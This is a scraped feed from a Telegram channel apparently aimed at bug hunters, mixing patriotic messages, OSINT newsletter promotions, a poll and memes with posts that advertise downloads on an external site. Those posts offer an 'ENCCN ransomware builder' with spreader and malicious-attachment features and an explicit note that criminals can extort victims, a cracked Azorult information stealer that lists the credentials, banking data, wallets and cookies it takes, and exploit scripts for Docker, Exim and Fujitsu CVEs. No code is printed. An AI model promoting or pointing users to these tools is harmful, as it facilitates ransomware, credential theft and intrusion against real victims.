CrackCodes 🇮🇳
15.9K subscribers
1.89K photos
387 videos
722 files
3.67K links
Official Websites: https://crackcodes.in |
For Bug Hunters: https://system32.ink

Admin: @MynK0x00
About Admin: prapattimynk.crackcodes.in


Be Secure~
जय श्री राम
Download Telegram
Forwarded from 57575704
अपने अदम्य साहस, वीरता और दृढ़ निश्चय से 1999 के कारगिल युद्ध में भारत की विजय पताका लहराने वाले हमारे वीर जवानों को 'कारगिल विजय दिवस' पर नमन।

अद्भुत शौर्य व बलिदान की सर्वोच्च परंपरा का निर्वाह कर, हमारे वीर सैनिकों ने मां भारती का मस्तक ऊंचा रखने के लिए अपना सर्वस्व समर्पित किया है।

राष्ट्र की सुरक्षा हेतु अपना सर्वोच्च बलिदान देने वाले उन हुतात्माओं के प्रति कृतज्ञ राष्ट्र सदैव ऋणी रहेगा।

जय हिंद!
7💔31🔥1
Forwarded from OSINT AMBITION (Dheeraj Yadav)
Wednesday Updates #6 is out now.

Highlights: 10 blogs, 8 external reading, 4 videos, 2 podcast episodes, 2 new events, 4 tool updates, 4 awesome tools, a resource collection and many more.

🔗 https://osintambition.substack.com/p/wednesday-updates-6

Don't forget to subscribe to get all new posts directly in your inbox. #osint #osintforgood #socmint #osinttools #osintnews #weeklyupdate
🔥2
Forwarded from 𝙇𝙤𝙨𝙩𝙨𝙚𝙘
today i just searched coffinxp on google and get so many good results i dont know i am mentioned in everywhere ❤️just type coffinxp or you can also type lostsec for same very good SEO on google..
check out some results i don't know this but after google i get some results thnq all who mentioned me ❤️😇

https://medium.com/@tom.sh/best-bug-hunting-methodology-for-ez-money-58b7fe928e6f

https://www.linkedin.com/posts/ethan-quinn-11621a238_bugbounty-pentesting-cybersecurity-activity-7201326813971693568-I_nE?utm_source=share&utm_medium=member_android

https://combot.org/stickers/coffin3

https://system32.in/topic/bug-hunting-methodology/

https://communityin.oppo.com/thread/1608156645420957702
😒 A Hacker Story About How He Hacked Anki,The 🛟 World's Most Popular 🩹Flashcard App


❗️Intro: It took him 10 days to go from “We think this might be vulnerable” to full-blown remote code execution, including the 7️⃣ days we were both on 🍿holiday.

🔠🔠🔠🔠 Full Blog : Click Here
Please open Telegram to view this post
VIEW IN TELEGRAM
Forwarded from CYBER TRICKS ZONE 🇮🇳🚩 (𝙋𝙧𝙤𝙩𝙤𝙘𝙤𝙡 𝙉𝙞𝙘𝙠)
🏳 CTF chall write-ups, files & scripts.

• CTF is one of the best methods to acquire the necessary skills in hacking various systems or gain unique knowledge in various aspects of information security.

• At the link below you can find a very useful repo, which contains current tools, scripts, platforms and video material on completing CTF. Save to favorites and use:

➡️ https://github.com/Crypto-Cat/CTF
This media is not supported in the widget
VIEW IN TELEGRAM
Forwarded from OSINT AMBITION (Dheeraj | OSINTAmbition)
Hey everyone, our founder has started a newsletter to share his learning about Cybersecurity, OSINT, startups, marketing, sales, money and other topics.

If anyone is interested in reading it, subscribe using the link below.

https://lifelong-learnings.beehiiv.com/

#osint #cybersecurity #marketing #sales #infosec #startups
🔠🔠🔠🔠🔠🔠🔠 🔣 https://system32.ink/cve-2024-41110-docker-authz-exploit/

#️⃣CVE-2024-41110 Docker AuthZ Exploit🚨


⚡️✏️Moby is an open-source project created by Docker for software containerization. A security vulnerability has been detected in certain versions of Docker Engine, which could allow an attacker to bypass authorization plugins (AuthZ) under specific circumstances. The base likelihood of this being exploited is low. Using a specially-crafted API request, an Engine API client could make the daemon forward the request or response to an authorization plugin without the body. In certain circumstances, the authorization plugin may allow a request which it would have otherwise denied if the body had been forwarded to it. A security issue was discovered In 2018, where an attacker could bypass AuthZ plugins using a specially crafted API request. This could lead to unauthorized actions, including privilege escalation. Although this issue was fixed in Docker Engine v18.09.1 ↗️
Please open Telegram to view this post
VIEW IN TELEGRAM
👍2
What coding 💻 language are you learning

This 💬information will help us to improve our content⤵️
Final Results
28%
🔠 And 🔠 DSA
28%
🔠🔠🔠🔠
46%
📱 (Nodejs,ReactJs etc.)
26%
🔠ava AND DSA
23%
💀CyberSecurity (All Field)
20%
💻Data Science
11%
😳Others
12👍84
This media is not supported in the widget
VIEW IN TELEGRAM
🗿8👍1
#meme 🐊
Please open Telegram to view this post
VIEW IN TELEGRAM
🤣8🗿1
🖥 🖥 Poku 2.0: A Cross-Platform Test Runner for JS⚡️

🖥Poku’s philosophy is to ‘bring the JavaScript essence back to testing.’ It runs the same way across Node, Bun and Deno, and auto-detects ESM, CommonJS and TypeScript.🔥

🧶 Link

#js #lib #tests #frontend
#release
Please open Telegram to view this post
VIEW IN TELEGRAM
This media is not supported in your browser
VIEW IN TELEGRAM
⚡️Legends Wrapped In Tiranga🇮🇳


This ⚡️Editz Channel Dedicated To Our ❤️ Brave Soldiers (Indian Army 🪖)

⭐️Please Subscribe 📌
https://t.me/abyush13ueu
Please open Telegram to view this post
VIEW IN TELEGRAM
10👍2🥰21🔥1
🖥 https://system32.ink/enccn-ransomware-builder/ 🖥

ENCCN Ransomware 👣 Builder Download


⚡️The latest edition of this software is beautifully established, that can help you to encrypt documents on the inflamed device. It allows the users to display a message to inform other users that their files are locked.

🤨Cybercriminals can demand a fee from their targets to restore their data, and in this way after they get the fee so it is on them whether they restore the victim's data or not.


🔥Features​🔣

There are so many features in the enccn ransomware builder windows 10 software and some of them are as follows below.

1️⃣Download Malware
2️⃣Fully featured
3️⃣Media library
4️⃣Execute the malware
5️⃣Windows shortcut exploit
Using reg
6️⃣Easy handling
7️⃣Windows shortcuts
8️⃣Registry injection
9️⃣Premium version
1️⃣0️⃣Malicious email attachments
1️⃣1️⃣Configuration
1️⃣2️⃣Fast
1️⃣3️⃣Stable
1️⃣4️⃣Come with advanced features
1️⃣5️⃣Support all kinds of browsers
1️⃣6️⃣Grab information about anyone
1️⃣7️⃣Malware maker
1️⃣8️⃣Encrypt files
1️⃣9️⃣Multiple languages
2️⃣0️⃣Spreader
2️⃣1️⃣Customizable
Many more.
Please open Telegram to view this post
VIEW IN TELEGRAM
👍532🤣1🍾1
This media is not supported in the widget
VIEW IN TELEGRAM
👌5👍1🍾1🆒1
🔠🔠🔠🔠0️⃣🔠🔠🔣

https://system32.ink/exim-mail-servers-cve-2024-39929-exploit/

🖥Exim through 4.97.1 misparses a multiline RFC 2231 header filename, and thus remote attackers can bypass a $mime_filename extension-blocking protection mechanism, and potentially deliver executable attachments to the mailboxes of end users. 🖥

🍰 EXIM Mail Servers CVE-2024-39929 Exploit 🏴‍☠️


The 🖥script performs the following actions:

⭐️Reads the list of SMTP servers from the specified file.
⭐️Prompts the user for sender and recipient email addresses.
🚨Connects to each SMTP server on port 25.
🚨Sends an email with a crafted attachment designed to exploit CVE-2024-39929.
#️⃣Sets the email subject to indicate the server used for sending the email.
#️⃣Prints debug information and handles exceptions.
Please open Telegram to view this post
VIEW IN TELEGRAM
🎉1
This media is not supported in the widget
VIEW IN TELEGRAM
4👾3👍2
🔣 https://system32.ink/fujitsu-network-edgiot-gw1500-m2m-gw-for-fenics-cve-2024-40617-exploit/ 🔣

🖥 FUJITSU Network 🖥 Edgiot GW1500 🖥 (M2M-GW for FENICS) CVE-2024-40617 Exploit


🖥 Path traversal vulnerability exists in FUJITSU Network Edgiot GW1500 (M2M-GW for FENICS). If a remote authenticated 🖥 attacker with User Class privilege sends a specially crafted request to the affected product, access restricted files containing sensitive information may be accessed. As a result, Administrator Class privileges of the product may be hijacked.🖥
Please open Telegram to view this post
VIEW IN TELEGRAM
Forwarded from OSINT AMBITION (Dheeraj | OSINTAmbition)
Wednesday Updates #7 is out now.

Highlights: 8 blogs, 5 external readings, 2 videos, 1 podcast episode, 1 new challenge, 2 tool updates, 4 awesome tools, a resource collection, and many more.

https://osintambition.substack.com/p/wednesday-updates-7

Don't forget to subscribe to get all new posts directly in your inbox. #osint #osintforgood #socmint #osinttools #osintnews #weeklyupdate
🖥 https://system32.ink/azorult-stealr-3-4-cracked/ 🖥

🖥 Azorult Stealr 3.4 Cracked 🖥


🖥 Azorult Stealer is a type of malware, specifically an information stealer, designed to gather sensitive information from infected computers. It targets a variety of data, including:

#️⃣Login credentials (usernames and passwords)
#️⃣Banking information
⚡️Cryptocurrency wallets
⚡️Browser history
😎Cookies
😎Stored form autofill data
🪪Files from the infected machine
Please open Telegram to view this post
VIEW IN TELEGRAM